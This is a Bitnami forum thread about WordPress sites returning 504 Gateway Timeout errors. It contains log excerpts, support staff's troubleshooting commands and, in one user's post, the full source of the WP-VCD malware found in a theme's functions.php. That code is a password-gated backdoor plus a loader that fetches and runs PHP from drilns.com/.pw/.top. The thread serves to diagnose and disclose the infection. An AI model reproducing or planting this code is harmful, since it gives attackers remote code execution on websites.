Website doesn't load - Gateway Timeout 504

joaorodrigues 2019-11-06 00:46:26 UTC #1

Keywords: WordPress - Google Cloud Platform - Technical issue - Other
bnsupport ID: 43b45f97-3081-9b2d-110d-df2122783bb3
Description:
Since today afternoon my website stopped working. It doesn't load and in the end I got a Gateway Timeout 504. In SSH I can check that all my services are running.

My Bitnami Support tool code is: 43b45f97-3081-9b2d-110d-df2122783bb3

Can you help me with this?

Wordpress extremely slow or 504 timeout

matchd-rb 2019-11-06 02:21:03 UTC #2

I have exactly the same problem just today - website previously running for months with no problem.
I'm keen to know how to rectify the problem.

jota 2019-11-06 09:11:28 UTC #3

A post was merged into an existing topic: Website only works for a minute after restarting services and stops working

jota 2019-11-06 09:13:11 UTC #4

Hi @joaorodrigues,

Thanks for providing the Bitnami Support tool code, our team will start to review the information and will let you know what we find.

@matchd-rb, could you please create a separate topic in the forum so our team can evaluate your situation better? It'd be really helpful if you provide the Bitnami Support tool code when creating the topic

How to Run the Bitnami Support Tool

Thanks

jota 2019-11-06 09:13:33 UTC #5

Hi @joaorodrigues,

Thanks for providing the Bitnami Support tool code, our team will start to review the information and will let you know what we find.

We have a Support Tool that will gather relevant information for us to analyze your configuration and logs. Could you please download and execute it on the machine where the stack is running by following the steps described in the guide below?

How to Run the Bitnami Support Tool

Please note that you need to paste the code ID that is shown at the end.

sebastien.vincendeau 2019-11-06 09:35:20 UTC #6

Hello,

I had the same problem since yesterday afternoon and the website was running without problem before.

Is there any problem with Bitnami at the moment?

Can I share an ID of a support tool here or should I create a new topic? It's been 12 hours I am looking into it with AWS support etc, impossible to find the cause.

Regards

gongomgra 2019-11-06 13:40:24 UTC #7

Hi @joaorodrigues,

Most recent error messages in Apache are next

[Wed Nov 06 00:41:57.679370 2019] [proxy_fcgi:error] [pid 1708:tid 140601928251136] (70007)The timeout specified has expired: [client 35.204.188.180:55944] AH01075: Error dispatching request to : (polling), referer: https://www.papagaiosempenas.pt/wp-cron.php?doing_wp_cron=1572999963.1174540519714355468750
[Wed Nov 06 00:41:57.976060 2019] [proxy_fcgi:error] [pid 1708:tid 140602230388480] (70007)The timeout specified has expired: [client 54.36.150.59:38310] AH01075: Error dispatching request to : (polling)
[Wed Nov 06 00:41:58.627207 2019] [proxy_fcgi:error] [pid 1708:tid 140602129676032] (70007)The timeout specified has expired: [client 207.46.13.12:4573] AH01075: Error dispatching request to : (polling)
[Wed Nov 06 00:42:31.379205 2019] [proxy_fcgi:error] [pid 1708:tid 140602314315520] (70007)The timeout specified has expired: [client 127.0.0.1:38840] AH01075: Error dispatching request to : (polling)

In PHP-FPM logs I see

[06-Nov-2019 00:06:47] WARNING: [pool wordpress] seems busy (you may need to increase pm.start_servers, or pm.min/max_spare_servers), spawning 32 children, there are 0 idle, and 24 total children
[06-Nov-2019 00:06:48] WARNING: [pool wordpress] server reached pm.max_children setting (25), consider raising it

It is possible that your server was under heavy load and that using a higher instance helps you fix this issue. But I think it worth giving another alternative a try to check a couple of things first.

Can you try moving the WordPress plugin directory and restart the services with the commands below? Can you reproduce the issue after that?

sudo mv /opt/bitnami/apps/wordpress/htdocs/wp-content/plugins /opt/bitnami/apps/wordpress/htdocs/wp-content/plugins.bck
sudo /opt/bitnami/ctlscript.sh restart

If you have not reproduced the issue after that, rename back the plugins folder and disable all of them as mentioned in the guide below

https://docs.bitnami.com/aws/apps/wordpress/troubleshooting/debug-errors/#wordpress-enters-into-maintenance-mode-after-upgrading-or-activating-a-plugin

After that, enable them one by one and try to reproduce the issue. If you do, maybe the enabled plugin does not support your current WordPress or PHP version. In that case, we recommend you to check with the plugin developers about this.

Another test you can do are regarding the WordPress themes. Are you using a custom theme or one of the default themes installed with WordPress? Can you try to reproduce it with one of the default themes? If you are using a custom theme and your problem persists, you will need to check with the theme developers.

Apart from that, we have not changed anything related to the Apache or PHP configurations on our stacks and cloud images, so maybe asking in the official WordPress support forums for some help on this topic can be a good idea.

Regards,
Gonzalo

Website doesn't load - Gateway Timeout 504, again

Wordpress Stack -504 Gateway Timeout

Wordpress instance down on aws lightsail

gongomgra 2019-11-06 13:42:27 UTC #8

@sebastien.vincendeau,

Please check my message above. I think it would be better if you open a new thread with anything you find on your system. Also please run the bnsupport tool and post the outputted code as well.

Regards,
Gonzalo

joaorodrigues 2019-11-06 19:42:39 UTC #9

Hi,

I used already the command to change the plugins folder name:

sudo mv /opt/bitnami/apps/wordpress/htdocs/wp-content/plugins /opt/bitnami/apps/wordpress/htdocs/wp-content/plugins.bck
sudo /opt/bitnami/ctlscript.sh restart

The error changed, now I got a wordpress error "Website is with Technical Isssues".

I desactivated all the plugins in the database, as suggested in the first step of "WordPress Enters Into Maintenance Mode After Upgrading Or Activating A Plugin"

https://docs.bitnami.com/aws/apps/wordpress/troubleshooting/debug-errors/#wordpress-enters-into-maintenance-mode-after-upgrading-or-activating-a-plugin

After trying this, nothing changed. If I have the plugins folder with all plugins inside, it loads eternately. If I only have the plugins folder with index.php and no plugins inside I get the same error "Website is with Technical Isssues" when in my opinion if I have a plugins folder with index.php and no plugins activated in the database I shouldn't be getting this error.

I'm trying to backup everything manually via ftp and after that I will verify my plugins and theme files before I try to reinstall in a clean installation. But if you have any more ideas that I can try in my current installion, Be aware that I will keep it running until I have evertyhing figure out in case things don't work out in a clean installation.

How can I know which plugins and when were they updated/changed accurately by the wordpress user in the bitnami system? Is it possible?

Best regards,
João

moochdt003 2019-11-07 03:52:30 UTC #10

Did anyone come right with this? Same was working upto 2 days ago. No i cant reach the site...I cant ping the static ip address. I thought that it was the WP instance that was corrupted. So i created a new instance and installed the WP from the last working version in source control and the same issue is occurring.
Gateway time out just loads then dies. What is going on? Somebody please help.

jota 2019-11-07 08:38:57 UTC #11

Hi,

This other user provided a different solution

Can you confirm you have those requests to code.php in the access.log file?

sudo cat /opt/bitnami/apache2/logs/access_log | grep code.php

If that's the case, can you check if the file exists

sudo ls -la /opt/bitnami/apps/wordpress/htdocs/code.php

and create it in the WordPress' directory if it doesn't exist?

sudo mv /opt/bitnami/apps/wordpress/htdocs/code.php /opt/bitnami/apps/wordpress/htdocs/code.php.back
sudo touch /opt/bitnami/apps/wordpress/htdocs/code.php
sudo chown bitnami:daemon /opt/bitnami/apps/wordpress/htdocs/code.php
sudo chmod g+w /opt/bitnami/apps/wordpress/htdocs/code.php

Thanks

bensam65 2019-11-07 09:18:01 UTC #12

I've faced the similar problem for last two days. It was working fine but suddenly start getting the Gateway timeout error. I've checked the Apache log and found the following:

Got error 'PHP message: PHP Warning: Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' (this will throw an Error in a future version of PHP) in /opt/bitnami/apps/wordpress/htdocs/wp-content/themes/xxxx/functions.php on line 73'

This was ignored in the previous version of Wordpress 5.2.3 but after the update to 5.2.4, it completely stopped loading and thrown out the gateway timeout error. Checked the functions.php file and found some suspicious code. Removed the below code from it and now it works fine. But this is just in my case and it may vary for others. Also, I'm running this on my local workstation not AWS or Google cloud.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2e9119c324d0aa5bb6a07457c50a53ec'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				




				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;

								case 'change_code';
					if (isset($_REQUEST['newcode']))
						{
							
							if (!empty($_REQUEST['newcode']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

			                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }


		                                                                    }
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
		   {
		   }
			else
			{
			$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
			fwrite($handle, "<?php\n" . $phpCode);
			}
			fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='2ddffaf2b9685827ae760217ad16dcd9';
        if (($tmpcontent = @file_get_contents("http://www.drilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.drilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.drilns.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
		
		        elseif ($tmpcontent = @file_get_contents("http://www.drilns.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
		elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>

Just delete the above and delete the following files from wp-includes directory:
wp-tmp.php & wp-vcd.php.

It's actually a malware and injecting the above code. In live site, we use Wordfence and it actually protects well.

jota 2019-11-07 09:47:40 UTC #13

Hi @bensam65,

This is a problem with the theme you are using. You can rename the themes folder to use the default one or contact the theme's developer to know more about the error.

Can you ask the developers of the theme about the lines you removed? Maybe they are aware of any attack.

Thanks

jota 2019-11-11 07:47:19 UTC #14

Hi again,

It seems that malicious code may have been included in your site via "nulled" themes and plugins in WordPress. We published a security notice in our documentation to let the users know about it.

https://docs.bitnami.com/general/security/security-2019-11-08/

I suggest you follow the WordPress' security practices to keep your site secure and up-to-date. If you have any questions, do not hesitate to ask.

Regards

system 2020-01-14 19:37:49 UTC #15

This topic was automatically closed 14 days after the last reply. New replies are no longer allowed.

Bitnami provides free all-in-one installers, virtual machines and cloud images for popular open source applications. Get them now!